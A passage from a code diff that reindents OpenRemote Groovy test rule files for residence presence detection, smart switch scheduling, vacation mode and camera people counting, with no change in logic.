+          LOG.info("Motion sensor triggered, updating last presence in residence room: " + room.assetName + " [" + room.id + "]")
+          facts.updateAssetState(room.id, "lastPresenceDetected", facts.bound("lastPresenceTimestamp") as Double)
         })
 
 rules.add()
         .name("Set presence detected flag of residence if presence is detected in any room")
-        .when(
-        { facts ->
-            // A room where the presence detected flag is set
+        .when({ facts ->
+          // A room where the presence detected flag is set
+          facts.matchAssetState(
+                  new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", true)
+                  ).flatMap { roomWithPresence ->
+            // and a residence parent where the presence detected flag is not set
             facts.matchAssetState(
-                    new AssetQuery().types(RoomAsset).attributeValue("presenceDetected", true)
-            ).flatMap { roomWithPresence ->
-                // and a residence parent where the presence detected flag is not set
-                facts.matchAssetState(
-                        new AssetQuery()
-                                .ids(roomWithPresence.parentId)
-                                .attributeValue("presenceDetected", false)
-                )
-            }.findFirst().map { residenceWithoutPresence ->
-                facts.bind("residence", residenceWithoutPresence)
-                true
-            }.orElse(false)
+                    new AssetQuery()
+                    .ids(roomWithPresence.parentId)
+                    .attributeValue("presenceDetected", false)
+                    )
+          }.findFirst().map { residenceWithoutPresence ->
+            facts.bind("residence", residenceWithoutPresence)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState residence = facts.bound("residence")
-            LOG.info("Presence detected in residence: " + residence.assetName + " [" + residence.id + "]")
-            facts.updateAssetState(residence.id, "presenceDetected", true)
+        .then({ facts ->
+          AssetState residence = facts.bound("residence")
+          LOG.info("Presence detected in residence: " + residence.assetName + " [" + residence.id + "]")
+          facts.updateAssetState(residence.id, "presenceDetected", true)
         })
 
 rules.add()
         .name("Clear presence detected flag of residence when no presence is detected in any room")
-        .when(
-        { facts ->
-            // A residence where the presence detected flag is set
+        .when({ facts ->
+          // A residence where the presence detected flag is set
+          facts.matchAssetState(
+                  new AssetQuery().types(BuildingAsset).attributeValue("presenceDetected", true)
+                  ).filter { residenceWithPresence ->
+            // and no room child of that residence has presence
             facts.matchAssetState(
-                    new AssetQuery().types(BuildingAsset).attributeValue("presenceDetected", true)
-            ).filter { residenceWithPresence ->
-                // and no room child of that residence has presence
-                facts.matchAssetState(
-                        new AssetQuery().types(RoomAsset).parents(residenceWithPresence.id)
-                                .attributeValue("presenceDetected", true)
-                ).count() == 0
-            }.findFirst().map { residenceWithPresence ->
-                facts.bind("residence", residenceWithPresence)
-                true
-            }.orElse(false)
+                    new AssetQuery().types(RoomAsset).parents(residenceWithPresence.id)
+                    .attributeValue("presenceDetected", true)
+                    ).count() == 0
+          }.findFirst().map { residenceWithPresence ->
+            facts.bind("residence", residenceWithPresence)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState residence = facts.bound("residence")
-            LOG.info("Presence gone in residence: " + residence.assetName + " [" + residence.id + "]")
-            facts.updateAssetState(residence.id, "presenceDetected", false)
+        .then({ facts ->
+          AssetState residence = facts.bound("residence")
+          LOG.info("Presence gone in residence: " + residence.assetName + " [" + residence.id + "]")
+          facts.updateAssetState(residence.id, "presenceDetected", false)
         })

--- a/test/src/test/resources/org/openremote/test/rules/ResidenceSmartSwitch.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ResidenceSmartSwitch.groovy
@@ -40,221 +40,211 @@ RulesBuilder rules = binding.rules
 final CYCLE_TIME_MILLISECONDS = (2.5 * 60 * 60 * 1000) as long
 
 enum SmartSwitchAttribute {
-    Mode, BeginEnd, StartTime, StopTime, Enabled
+  Mode, BeginEnd, StartTime, StopTime, Enabled
 }
 
 enum SmartSwitchMode {
-    NOW_ON, ON_AT, READY_AT
+  NOW_ON, ON_AT, READY_AT
 
-    static boolean matches(AssetState smartSwitch, SmartSwitchMode mode) {
-        smartSwitch.value.orElse(false)
-    }
+  static boolean matches(AssetState smartSwitch, SmartSwitchMode mode) {
+    smartSwitch.value.orElse(false)
+  }
 }
 
 Closure<Stream<AssetState<?>>> smartSwitchAttributesMatch = { RulesFacts facts, SmartSwitchAttribute attribute ->
-    facts.matchAssetState(
-            new AssetQuery().types(RoomAsset).attributes(new AttributePredicate(new StringPredicate(BEGIN, "smartSwitch" + attribute.name()), null))
-    )
+  facts.matchAssetState(
+  new AssetQuery().types(RoomAsset).attributes(new AttributePredicate(new StringPredicate(BEGIN, "smartSwitch" + attribute.name()), null))
+  )
 }
 
 Closure<Character> getSmartSwitchName = { AssetState attribute ->
-    attribute.name.charAt(attribute.name.length() - 1)
+  attribute.name.charAt(attribute.name.length() - 1)
 }
 
 Closure<Optional<AssetState<?>>> smartSwitchAttributeMatch = { RulesFacts facts, AssetState smartSwitch, SmartSwitchAttribute attribute ->
-    facts.matchFirstAssetState(
-            new AssetQuery().types(RoomAsset).attributeName("smartSwitch" + attribute.name() + getSmartSwitchName(smartSwitch))
-    )
+  facts.matchFirstAssetState(
+  new AssetQuery().types(RoomAsset).attributeName("smartSwitch" + attribute.name() + getSmartSwitchName(smartSwitch))
+  )
 }
 
 rules.add()
         .name("Clear start/stop time and disable actuator when begin/end of cycle is empty")
-        .when(
-        { facts ->
-            smartSwitchAttributesMatch(
-                    facts, SmartSwitchAttribute.BeginEnd
-            ).filter { beginEnd ->
-                !beginEnd.value.isPresent()
-            }.filter { emptyBeginEnd ->
-                // Any of start time, stop time, or enabled is greater than zero
-                def startTime = smartSwitchAttributeMatch(facts, emptyBeginEnd, SmartSwitchAttribute.StartTime)
-                def stopTime = smartSwitchAttributeMatch(facts, emptyBeginEnd, SmartSwitchAttribute.StopTime)
-                def enabled = smartSwitchAttributeMatch(facts, emptyBeginEnd, SmartSwitchAttribute.Enabled)
-                (startTime.isPresent() && startTime.get().value.orElse(0l) > 0l) ||
-                        (stopTime.isPresent() && stopTime.get().value.orElse(0l) > 0l) ||
-                        (enabled.isPresent() && enabled.get().value.orElse(0l) > 0l)
-            }.findFirst().map { emptyBeginEnd ->
-                facts.bind("beginEnd", emptyBeginEnd)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          smartSwitchAttributesMatch(
+                  facts, SmartSwitchAttribute.BeginEnd
+                  ).filter { beginEnd ->
+            !beginEnd.value.isPresent()
+          }.filter { emptyBeginEnd ->
+            // Any of start time, stop time, or enabled is greater than zero
+            def startTime = smartSwitchAttributeMatch(facts, emptyBeginEnd, SmartSwitchAttribute.StartTime)
+            def stopTime = smartSwitchAttributeMatch(facts, emptyBeginEnd, SmartSwitchAttribute.StopTime)
+            def enabled = smartSwitchAttributeMatch(facts, emptyBeginEnd, SmartSwitchAttribute.Enabled)
+            (startTime.isPresent() && startTime.get().value.orElse(0l) > 0l) ||
+                    (stopTime.isPresent() && stopTime.get().value.orElse(0l) > 0l) ||
+                    (enabled.isPresent() && enabled.get().value.orElse(0l) > 0l)
+          }.findFirst().map { emptyBeginEnd ->
+            facts.bind("beginEnd", emptyBeginEnd)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState beginEnd = facts.bound("beginEnd")
-            LOG.info("Empty smart switch begin/end, clearing start/stop time and disabling actuator: " + beginEnd)
-            String smartSwitchName = getSmartSwitchName(beginEnd)
-            facts.updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StartTime + smartSwitchName, 0)
-                    .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StopTime + smartSwitchName, 0)
-                    .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.Enabled + smartSwitchName, 0)
+        .then({ facts ->
+          AssetState beginEnd = facts.bound("beginEnd")
+          LOG.info("Empty smart switch begin/end, clearing start/stop time and disabling actuator: " + beginEnd)
+          String smartSwitchName = getSmartSwitchName(beginEnd)
+          facts.updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StartTime + smartSwitchName, 0)
+                  .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StopTime + smartSwitchName, 0)
+                  .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.Enabled + smartSwitchName, 0)
         })
 
 rules.add()
         .name("Clear begin/end of cycle when mode is NOW_ON")
-        .when(
-        { facts ->
-            smartSwitchAttributesMatch(
-                    facts, SmartSwitchAttribute.Mode
-            ).filter { mode ->
-                SmartSwitchMode.matches(mode, SmartSwitchMode.NOW_ON)
-            }.filter { modeNowOn ->
-                // Begin/end time of cycle is greater than zero
-                smartSwitchAttributeMatch(facts, modeNowOn, SmartSwitchAttribute.BeginEnd)
-                        .flatMap { it.getValue(Long.class) }
-                        .map { it > 0 }
-                        .orElse(false)
-            }.findFirst().map { modeNowOn ->
-                facts.bind("mode", modeNowOn)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          smartSwitchAttributesMatch(
+                  facts, SmartSwitchAttribute.Mode
+                  ).filter { mode ->
+            SmartSwitchMode.matches(mode, SmartSwitchMode.NOW_ON)
+          }.filter { modeNowOn ->
+            // Begin/end time of cycle is greater than zero
+            smartSwitchAttributeMatch(facts, modeNowOn, SmartSwitchAttribute.BeginEnd)
+            .flatMap { it.getValue(Long.class) }
+            .map { it> 0 }
+            .orElse(false)
+          }.findFirst().map { modeNowOn ->
+            facts.bind("mode", modeNowOn)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState mode = facts.bound("mode")
-            LOG.info("Smart switch mode is NOW_ON, clearing begin/end of cycle: " + mode)
-            String smartSwitchName = getSmartSwitchName(mode)
-            facts.updateAssetState(mode.id, "smartSwitch" + SmartSwitchAttribute.BeginEnd + smartSwitchName)
+        .then({ facts ->
+          AssetState mode = facts.bound("mode")
+          LOG.info("Smart switch mode is NOW_ON, clearing begin/end of cycle: " + mode)
+          String smartSwitchName = getSmartSwitchName(mode)
+          facts.updateAssetState(mode.id, "smartSwitch" + SmartSwitchAttribute.BeginEnd + smartSwitchName)
         })
 
 rules.add()
         .name("Enable actuator when mode is ON_AT and begin/end of cycle is now or in future and different than actuator start time")
-        .when(
-        { facts ->
-            smartSwitchAttributesMatch(
-                    facts, SmartSwitchAttribute.Mode
-            ).filter { mode ->
-                SmartSwitchMode.matches(mode, SmartSwitchMode.ON_AT)
-            }.map { modeOnAt ->
-                smartSwitchAttributeMatch(facts, modeOnAt, SmartSwitchAttribute.BeginEnd)
-            }.filter { beginEnd ->
-                // User-provided begin/end time of cycle
-                beginEnd.flatMap { it.value}.filter {
-                    // is now or in future
-                    it >= facts.clock.currentTimeMillis
-                }.map { expectedStartTime ->
-                    // and actuator start time attribute
-                    def startTime = beginEnd.flatMap {
-                        smartSwitchAttributeMatch(facts, it, SmartSwitchAttribute.StartTime)
-                    }
-                    // is present
-                    startTime.isPresent() &&
-                            // the value is not the same as the expected start time
-                            startTime.map {
-                                it.value.map {
-                                    it != expectedStartTime
-                                }.orElse(true) // or actuator start time is empty
-                            }
-                }.orElse(false)
-            }.findFirst().map {beginEnd ->
-                facts.bind("beginEnd", beginEnd.get())
-                true
+        .when({ facts ->
+          smartSwitchAttributesMatch(
+                  facts, SmartSwitchAttribute.Mode
+                  ).filter { mode ->
+            SmartSwitchMode.matches(mode, SmartSwitchMode.ON_AT)
+          }.map { modeOnAt ->
+            smartSwitchAttributeMatch(facts, modeOnAt, SmartSwitchAttribute.BeginEnd)
+          }.filter { beginEnd ->
+            // User-provided begin/end time of cycle
+            beginEnd.flatMap { it.value}.filter {
+              // is now or in future
+              it >= facts.clock.currentTimeMillis
+            }.map { expectedStartTime ->
+              // and actuator start time attribute
+              def startTime = beginEnd.flatMap {
+                smartSwitchAttributeMatch(facts, it, SmartSwitchAttribute.StartTime)
+              }
+              // is present
+              startTime.isPresent() &&
+                      // the value is not the same as the expected start time
+                      startTime.map {
+                        it.value.map {
+                          it != expectedStartTime
+                        }.orElse(true) // or actuator start time is empty
+                      }
             }.orElse(false)
+          }.findFirst().map {beginEnd ->
+            facts.bind("beginEnd", beginEnd.get())
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState<Long> beginEnd = facts.bound("beginEnd")
-            // Start time is user-provided begin/end (in seconds)
-            def startSeconds = beginEnd.value.orElse(0l)
-            // Stop time is start time plus CYCLE_TIME_MILLISECONDS
-            def stopMilliseconds = startSeconds + CYCLE_TIME_MILLISECONDS
-            LOG.info("Smart switch mode is ON_AT, enabling actuator with start/stop times " +
-                    Instant.ofEpochMilli(startSeconds).atZone(ZoneId.systemDefault()).toLocalDateTime() +
-                    "/" +
-                    Instant.ofEpochMilli(stopMilliseconds).atZone(ZoneId.systemDefault()).toLocalDateTime() +
-                    ": " + beginEnd)
-            String smartSwitchName = getSmartSwitchName(beginEnd)
-            facts.updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StartTime + smartSwitchName, startSeconds)
-                    .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StopTime + smartSwitchName, stopMilliseconds)
-                    .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.Enabled + smartSwitchName, 1)
+        .then({ facts ->
+          AssetState<Long> beginEnd = facts.bound("beginEnd")
+          // Start time is user-provided begin/end (in seconds)
+          def startSeconds = beginEnd.value.orElse(0l)
+          // Stop time is start time plus CYCLE_TIME_MILLISECONDS
+          def stopMilliseconds = startSeconds + CYCLE_TIME_MILLISECONDS
+          LOG.info("Smart switch mode is ON_AT, enabling actuator with start/stop times " +
+                  Instant.ofEpochMilli(startSeconds).atZone(ZoneId.systemDefault()).toLocalDateTime() +
+                  "/" +
+                  Instant.ofEpochMilli(stopMilliseconds).atZone(ZoneId.systemDefault()).toLocalDateTime() +
+                  ": " + beginEnd)
+          String smartSwitchName = getSmartSwitchName(beginEnd)
+          facts.updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StartTime + smartSwitchName, startSeconds)
+                  .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StopTime + smartSwitchName, stopMilliseconds)
+                  .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.Enabled + smartSwitchName, 1)
         })
 
 rules.add()
         .name("Enable actuator when mode is READY_AT and cycle will complete in future and different than actuator stop time")
-        .when(
-        { facts ->
-            smartSwitchAttributesMatch(
-                    facts, SmartSwitchAttribute.Mode
-            ).filter { mode ->
-                SmartSwitchMode.matches(mode, SmartSwitchMode.READY_AT)
-            }.map { modeReadyAt ->
-                smartSwitchAttributeMatch(facts, modeReadyAt, SmartSwitchAttribute.BeginEnd)
-            }.filter { beginEnd ->
-                // User-provided begin/end time of cycle
-                beginEnd.flatMap { it.value}.filter {
-                    // allows the cycle to complete in future
-                    (it - CYCLE_TIME_MILLISECONDS) >= facts.clock.currentTimeMillis
-                }.map { expectedStopTime ->
-                    // and actuator stop time attribute
-                    def stopTime = beginEnd.flatMap {
-                        smartSwitchAttributeMatch(facts, it, SmartSwitchAttribute.StopTime)
-                    }
-                    // is present
-                    stopTime.isPresent() &&
-                            // the value is not the same as the expected stop time
-                            stopTime.flatMap { it.value}.map {
-                                it != expectedStopTime
-                            }.orElse(true) // or actuator stop time is empty
-                }.orElse(false)
-            }.findFirst().map { beginEnd ->
-                facts.bind("beginEnd", beginEnd.get())
-                true
+        .when({ facts ->
+          smartSwitchAttributesMatch(
+                  facts, SmartSwitchAttribute.Mode
+                  ).filter { mode ->
+            SmartSwitchMode.matches(mode, SmartSwitchMode.READY_AT)
+          }.map { modeReadyAt ->
+            smartSwitchAttributeMatch(facts, modeReadyAt, SmartSwitchAttribute.BeginEnd)
+          }.filter { beginEnd ->
+            // User-provided begin/end time of cycle
+            beginEnd.flatMap { it.value}.filter {
+              // allows the cycle to complete in future
+              (it - CYCLE_TIME_MILLISECONDS) >= facts.clock.currentTimeMillis
+            }.map { expectedStopTime ->
+              // and actuator stop time attribute
+              def stopTime = beginEnd.flatMap {
+                smartSwitchAttributeMatch(facts, it, SmartSwitchAttribute.StopTime)
+              }
+              // is present
+              stopTime.isPresent() &&
+                      // the value is not the same as the expected stop time
+                      stopTime.flatMap { it.value}.map {
+                        it != expectedStopTime
+                      }.orElse(true) // or actuator stop time is empty
             }.orElse(false)
+          }.findFirst().map { beginEnd ->
+            facts.bind("beginEnd", beginEnd.get())
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState<Long> beginEnd = facts.bound("beginEnd")
-            // Start time is current time (in seconds)
-            def startMilliseconds = facts.clock.currentTimeMillis
-            // Stop time is user-provided smart switch time (in seconds)
-            def stopMilliseconds = beginEnd.value.orElse(0l)
-            LOG.info("Smart switch mode is READY_AT, enabling actuator with start/stop times " +
-                    Instant.ofEpochMilli(startMilliseconds).atZone(ZoneId.systemDefault()).toLocalDateTime() + "/" +
-                    Instant.ofEpochMilli(stopMilliseconds).atZone(ZoneId.systemDefault()).toLocalDateTime() +
-                    ": " +
-                    beginEnd)
-            String smartSwitchName = getSmartSwitchName(beginEnd)
-            facts.updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StartTime + smartSwitchName, startMilliseconds)
-                    .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StopTime + smartSwitchName, stopMilliseconds)
-                    .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.Enabled + smartSwitchName, 1)
+        .then({ facts ->
+          AssetState<Long> beginEnd = facts.bound("beginEnd")
+          // Start time is current time (in seconds)
+          def startMilliseconds = facts.clock.currentTimeMillis
+          // Stop time is user-provided smart switch time (in seconds)
+          def stopMilliseconds = beginEnd.value.orElse(0l)
+          LOG.info("Smart switch mode is READY_AT, enabling actuator with start/stop times " +
+                  Instant.ofEpochMilli(startMilliseconds).atZone(ZoneId.systemDefault()).toLocalDateTime() + "/" +
+                  Instant.ofEpochMilli(stopMilliseconds).atZone(ZoneId.systemDefault()).toLocalDateTime() +
+                  ": " +
+                  beginEnd)
+          String smartSwitchName = getSmartSwitchName(beginEnd)
+          facts.updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StartTime + smartSwitchName, startMilliseconds)
+                  .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.StopTime + smartSwitchName, stopMilliseconds)
+                  .updateAssetState(beginEnd.id, "smartSwitch" + SmartSwitchAttribute.Enabled + smartSwitchName, 1)
         })
 
 rules.add()
         .name("Set mode NOW_ON when mode is ON_AT or READY_AT and actuator stop time is in the past")
-        .when(
-        { facts ->
-            smartSwitchAttributesMatch(
-                    facts, SmartSwitchAttribute.Mode
-            ).filter { mode ->
-                SmartSwitchMode.matches(mode, SmartSwitchMode.ON_AT) || SmartSwitchMode.matches(mode, SmartSwitchMode.READY_AT)
-            }.map { modeOnAtOrReadyAt ->
-                smartSwitchAttributeMatch(facts, modeOnAtOrReadyAt, SmartSwitchAttribute.StopTime)
-            }.filter { stopTime ->
-                // Actuator stop time attribute is present and value (in seconds) is not zero and in the past
-                stopTime.flatMap { it.value}.map {
-                    it > 0 && it < facts.clock.currentTimeMillis
-                }.orElse(false)
-            }.findFirst().map { stopTime ->
-                facts.bind("stopTime", stopTime.get())
-                true
+        .when({ facts ->
+          smartSwitchAttributesMatch(
+                  facts, SmartSwitchAttribute.Mode
+                  ).filter { mode ->
+            SmartSwitchMode.matches(mode, SmartSwitchMode.ON_AT) || SmartSwitchMode.matches(mode, SmartSwitchMode.READY_AT)
+          }.map { modeOnAtOrReadyAt ->
+            smartSwitchAttributeMatch(facts, modeOnAtOrReadyAt, SmartSwitchAttribute.StopTime)
+          }.filter { stopTime ->
+            // Actuator stop time attribute is present and value (in seconds) is not zero and in the past
+            stopTime.flatMap { it.value}.map {
+              it> 0 && it <facts.clock.currentTimeMillis
             }.orElse(false)
+          }.findFirst().map { stopTime ->
+            facts.bind("stopTime", stopTime.get())
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState stopTime = facts.bound("stopTime")
-            LOG.info("Smart switch actuator stop time is in the past, setting mode NOW_ON: " + stopTime)
-            String smartSwitchName = getSmartSwitchName(stopTime)
-            facts.updateAssetState(
-                    stopTime.id,
-                    "smartSwitch" + SmartSwitchAttribute.Mode + smartSwitchName,
-                    SmartSwitchMode.NOW_ON.name()
-            )
+        .then({ facts ->
+          AssetState stopTime = facts.bound("stopTime")
+          LOG.info("Smart switch actuator stop time is in the past, setting mode NOW_ON: " + stopTime)
+          String smartSwitchName = getSmartSwitchName(stopTime)
+          facts.updateAssetState(
+                          stopTime.id,
+                          "smartSwitch" + SmartSwitchAttribute.Mode + smartSwitchName,
+                          SmartSwitchMode.NOW_ON.name()
+                          )
         })

--- a/test/src/test/resources/org/openremote/test/rules/ResidenceVacationMode.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/ResidenceVacationMode.groovy
@@ -40,109 +40,101 @@ Assets assets = binding.assets
 
 @ToString(includeNames = true)
 class VacationMode {
-    String residenceId
-    double until
+  String residenceId
+  double until
 }
 
 rules.add()
         .name("When residence has vacation until in future, add vacation mode, execute DAY scene and disable scene timers")
-        .when(
-        { facts ->
-            facts.matchAssetState(
-                    new AssetQuery().types(BuildingAsset)
-                            .attributeValue("vacationUntil", GREATER_THAN, facts.clock.currentTimeMillis)
-            ).filter { residenceWithVacationUntil ->
-                facts.match(VacationMode).noneMatch {
-                    vacationMode -> vacationMode.residenceId == residenceWithVacationUntil.id
-                }
-            }.findFirst().map { residenceWithoutVacationMode ->
-                facts.bind("residenceId", residenceWithoutVacationMode.id)
-                        .bind("vacationUntil", residenceWithoutVacationMode.value.get())
-                true
-            }.orElse(false)
+        .when({ facts ->
+          facts.matchAssetState(
+                  new AssetQuery().types(BuildingAsset)
+                  .attributeValue("vacationUntil", GREATER_THAN, facts.clock.currentTimeMillis)
+                  ).filter { residenceWithVacationUntil ->
+            facts.match(VacationMode).noneMatch { vacationMode ->
+              vacationMode.residenceId == residenceWithVacationUntil.id
+            }
+          }.findFirst().map { residenceWithoutVacationMode ->
+            facts.bind("residenceId", residenceWithoutVacationMode.id)
+            .bind("vacationUntil", residenceWithoutVacationMode.value.get())
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            VacationMode vacationMode = new VacationMode(
-                    residenceId: facts.bound("residenceId"),
-                    until: facts.bound("vacationUntil")
-            )
-            LOG.info("Vacation mode enabled: " + vacationMode)
+        .then({ facts ->
+          VacationMode vacationMode = new VacationMode(
+                  residenceId: facts.bound("residenceId"),
+                  until: facts.bound("vacationUntil")
+                  )
+          LOG.info("Vacation mode enabled: " + vacationMode)
 
-            def vacationModeExpiresMillis = vacationMode.until - facts.clock.currentTimeMillis
-            facts.putTemporary(vacationModeExpiresMillis, vacationMode)
+          def vacationModeExpiresMillis = vacationMode.until - facts.clock.currentTimeMillis
+          facts.putTemporary(vacationModeExpiresMillis, vacationMode)
 
-            facts.updateAssetState(vacationMode.residenceId, "dayScene", REQUEST_START)
-                    .updateAssetState(vacationMode.residenceId, "disableSceneTimer", REQUEST_START)
+          facts.updateAssetState(vacationMode.residenceId, "dayScene", REQUEST_START)
+                  .updateAssetState(vacationMode.residenceId, "disableSceneTimer", REQUEST_START)
         })
 
 rules.add()
         .name("When residence has vacation until in past, clear it and enable scene timers")
-        .when(
-        { facts ->
-            facts.matchAssetState(
-                    new AssetQuery().types(BuildingAsset)
-                            .attributeValue("vacationUntil", LESS_EQUALS, facts.clock.currentTimeMillis)
-            ).filter { residenceWithVacationUntilInPast ->
-                residenceWithVacationUntilInPast.getValue(Double.class).isPresent()
-            }.filter { residenceWithVacationUntilInPast ->
-                facts.match(VacationMode).noneMatch {
-                    vacationMode -> vacationMode.residenceId == residenceWithVacationUntilInPast.id
-                }
-            }.findFirst().map { residenceWithVacationUntilInPastWithoutVacationMode ->
-                facts.bind("residence", residenceWithVacationUntilInPastWithoutVacationMode)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          facts.matchAssetState(
+                  new AssetQuery().types(BuildingAsset)
+                  .attributeValue("vacationUntil", LESS_EQUALS, facts.clock.currentTimeMillis)
+                  ).filter { residenceWithVacationUntilInPast ->
+            residenceWithVacationUntilInPast.getValue(Double.class).isPresent()
+          }.filter { residenceWithVacationUntilInPast ->
+            facts.match(VacationMode).noneMatch { vacationMode ->
+              vacationMode.residenceId == residenceWithVacationUntilInPast.id
+            }
+          }.findFirst().map { residenceWithVacationUntilInPastWithoutVacationMode ->
+            facts.bind("residence", residenceWithVacationUntilInPastWithoutVacationMode)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            AssetState residence = facts.bound("residence")
-            LOG.info("Vacation ended in residence: " + residence.assetName)
-            facts.updateAssetState(residence.id, "vacationUntil")
-            assets.dispatch(residence.id, "enableSceneTimer", REQUEST_START)
+        .then({ facts ->
+          AssetState residence = facts.bound("residence")
+          LOG.info("Vacation ended in residence: " + residence.assetName)
+          facts.updateAssetState(residence.id, "vacationUntil")
+          assets.dispatch(residence.id, "enableSceneTimer", REQUEST_START)
         })
 
 rules.add()
         .name("Remove vacation mode when residence has different vacation until")
-        .when(
-        { facts ->
-            facts.matchFirst(VacationMode) { vacationMode ->
-                facts.matchFirstAssetState(
-                        new AssetQuery().types(BuildingAsset)
-                                .ids(vacationMode.residenceId)
-                                .attributes(new AttributePredicate(new StringPredicate("vacationUntil"), new ValueEmptyPredicate().negate(true)))
-                ).map { residence ->
-                    vacationMode.until != residence.value.get()
-                }.orElse(false)
-            }.map { vacationMode ->
-                facts.bind("vacationMode", vacationMode)
-                true
+        .when({ facts ->
+          facts.matchFirst(VacationMode) { vacationMode ->
+            facts.matchFirstAssetState(
+                    new AssetQuery().types(BuildingAsset)
+                    .ids(vacationMode.residenceId)
+                    .attributes(new AttributePredicate(new StringPredicate("vacationUntil"), new ValueEmptyPredicate().negate(true)))
+                    ).map { residence ->
+              vacationMode.until != residence.value.get()
             }.orElse(false)
+          }.map { vacationMode ->
+            facts.bind("vacationMode", vacationMode)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            VacationMode vacationMode = facts.bound("vacationMode")
-            LOG.info("Removing outdated vacation mode: " + vacationMode)
-            facts.remove(vacationMode)
+        .then({ facts ->
+          VacationMode vacationMode = facts.bound("vacationMode")
+          LOG.info("Removing outdated vacation mode: " + vacationMode)
+          facts.remove(vacationMode)
         })
 
 rules.add()
         .name("Remove vacation mode when residence has no vacation until, enable scene timers")
-        .when(
-        { facts ->
-            facts.matchFirst(VacationMode) { vacationMode ->
-                !facts.matchFirstAssetState(
-                        new AssetQuery().types(BuildingAsset)
-                                .ids(vacationMode.residenceId)
-                                .attributes(new AttributePredicate(new StringPredicate("vacationUntil"), new ValueEmptyPredicate().negate(true)))).isPresent()
-            }.map { vacationMode ->
-                facts.bind("vacationMode", vacationMode)
-                true
-            }.orElse(false)
+        .when({ facts ->
+          facts.matchFirst(VacationMode) { vacationMode ->
+            !facts.matchFirstAssetState(
+                    new AssetQuery().types(BuildingAsset)
+                    .ids(vacationMode.residenceId)
+                    .attributes(new AttributePredicate(new StringPredicate("vacationUntil"), new ValueEmptyPredicate().negate(true)))).isPresent()
+          }.map { vacationMode ->
+            facts.bind("vacationMode", vacationMode)
+            true
+          }.orElse(false)
         })
-        .then(
-        { facts ->
-            VacationMode vacationMode = facts.bound("vacationMode")
-            LOG.info("Vacation mode disabled: " + vacationMode)
-            facts.remove(vacationMode)
+        .then({ facts ->
+          VacationMode vacationMode = facts.bound("vacationMode")
+          LOG.info("Vacation mode disabled: " + vacationMode)
+          facts.remove(vacationMode)
         })

--- a/test/src/test/resources/org/openremote/test/rules/SmartCityCamera.groovy
+++ b/test/src/test/resources/org/openremote/test/rules/SmartCityCamera.groovy
@@ -37,77 +37,74 @@ def cameraTotals = new HashMap<String, Integer>()
 
 rules.add()
         .name("Count persons in sight")
-        .when({
-    facts ->
+        .when({ facts ->
 
-        def totals = facts.matchAssetState(new AssetQuery()
-                .names(new StringPredicate(AssetQuery.Match.BEGIN, "Camera"))
-                .attributeName("cameraCountIn"))
-                .map(
-                {
-                    new Tuple(it.id, it.getValue(Double.class).orElse(0d) - facts.matchFirstAssetState(new AssetQuery()
-                            .names(new StringPredicate(AssetQuery.Match.BEGIN, "Camera"))
-                            .attributeName("cameraCountOut"))
-                            .map({ it.getValue(Double.class).orElse(0d)}).orElse(0d))
-                })
-                .filter(
-                {
-                    cameraTotals.getOrDefault(it.get(0), new Integer(0)) != it.get(1)
-                })
-                .collect(Collectors.toMap({ Tuple tuple -> tuple.get(0) as String }, { Tuple tuple -> tuple.get(1) as Integer }))
+          def totals = facts.matchAssetState(new AssetQuery()
+          .names(new StringPredicate(AssetQuery.Match.BEGIN, "Camera"))
+          .attributeName("cameraCountIn"))
+          .map({
+            new Tuple(it.id, it.getValue(Double.class).orElse(0d) - facts.matchFirstAssetState(new AssetQuery()
+            .names(new StringPredicate(AssetQuery.Match.BEGIN, "Camera"))
+            .attributeName("cameraCountOut"))
+            .map({ it.getValue(Double.class).orElse(0d)}).orElse(0d))
+          })
+          .filter({
+            cameraTotals.getOrDefault(it.get(0), new Integer(0)) != it.get(1)
+          })
+          .collect(Collectors.toMap({ Tuple tuple ->
+            tuple.get(0) as String
+          }, { Tuple tuple ->
+            tuple.get(1) as Integer
+          }))
 
-        if (!totals.isEmpty()) {
+          if (!totals.isEmpty()) {
             facts.bind("totals", totals)
             true
-        } else {
+          } else {
             false
-        }
-}).then({
-    facts ->
-        Map<String, Integer> totals = facts.bound("totals")
-        def attributesEvents = []
-        totals.forEach({ k, v ->
+          }
+        }).then({ facts ->
+          Map<String, Integer> totals = facts.bound("totals")
+          def attributesEvents = []
+          totals.forEach({ k, v ->
             cameraTotals.put(k, v)
             attributesEvents << new AttributeEvent(k, "cameraCountTotal", v)
+          })
+          assets.dispatch(attributesEvents.toArray(new AttributeEvent[attributesEvents.size()]))
         })
